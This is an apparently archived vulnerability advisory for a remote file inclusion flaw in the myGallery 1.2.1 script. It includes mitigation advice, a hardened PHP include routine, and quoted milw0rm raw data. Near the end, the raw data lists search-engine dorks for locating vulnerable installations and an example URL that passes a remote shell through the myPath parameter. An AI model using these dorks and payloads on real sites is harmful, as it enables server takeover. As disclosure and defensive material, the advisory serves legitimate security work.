Vendor: myGallery
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: myGallery
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

myGallery 1.2.1 Remote File Include Vulnerability

The myGallery 1.2.1 script is vulnerable to remote file inclusion. The flaw allows an attacker to include and execute arbitrary remote files on the server.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. Users are advised to update to the latest version of the myGallery script. Additionally, webmasters should implement proper input validation and filtering to prevent remote file inclusion vulnerabilities.
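The `require_once($mypath.'/wp-config.php')` pattern quoted in the raw advisory below, rewritten defensively as an added example (this is not myGallery's or the vendor's code; it assumes PHP 7.1+ and that the script's own directory is the only trusted base):

```php
<?php
// Added example, not myGallery's own code: a hardened replacement for the
// `$mypath = $_GET['myPath']; require_once($mypath.'/wp-config.php');`
// pattern from the advisory (PHP 7.1+ assumed). The best fix is to drop the
// request parameter and derive the path from __FILE__; if the parameter must
// stay, it is only honoured after canonicalisation and a containment check.

/**
 * Return the canonical directory to include from, or null when $candidate is
 * not a plain, existing directory inside $base_dir.
 */
function safe_include_dir(string $candidate, string $base_dir): ?string
{
    // A URL scheme (http://, ftp://, php://, data:, ...) is what turns this
    // bug into remote code execution when allow_url_include is enabled.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;
    }
    // A NUL byte can truncate the path seen by the filesystem layer.
    if (strpos($candidate, "\0") !== false) {
        return null;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // Resolve relative to the base; realpath() collapses any ../ segments.
    $real = realpath($base . DIRECTORY_SEPARATOR . $candidate);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    // Containment: $real must be $base itself or lie strictly beneath it.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Same GET/POST precedence as the original, but the value is validated
// before it reaches require_once().
$candidate = empty($_POST) ? ($_GET['myPath'] ?? '') : ($_POST['myPath'] ?? '');
$mypath    = safe_include_dir((string) $candidate, __DIR__);
if ($mypath === null) {
    http_response_code(400);
    exit('Invalid myPath');
}
require_once $mypath . '/wp-config.php';
```

With this in place a value such as `http://host/`, `../../..` or a NUL-truncated path is rejected with HTTP 400 before any include runs, independent of the `allow_url_include` setting.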

Exploit-DB raw data:

# myGallery 1.2.1 (myPath) Remote File Include Vulnerability
# Script Page : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
#########################################################
# if (!$_POST){
# 	$mypath=$_GET['myPath']; <---------[+]
# 
# }
# else {
# 	$mypath=$_POST['myPath'];<---------[+]
# 	
# 	
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork : 
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]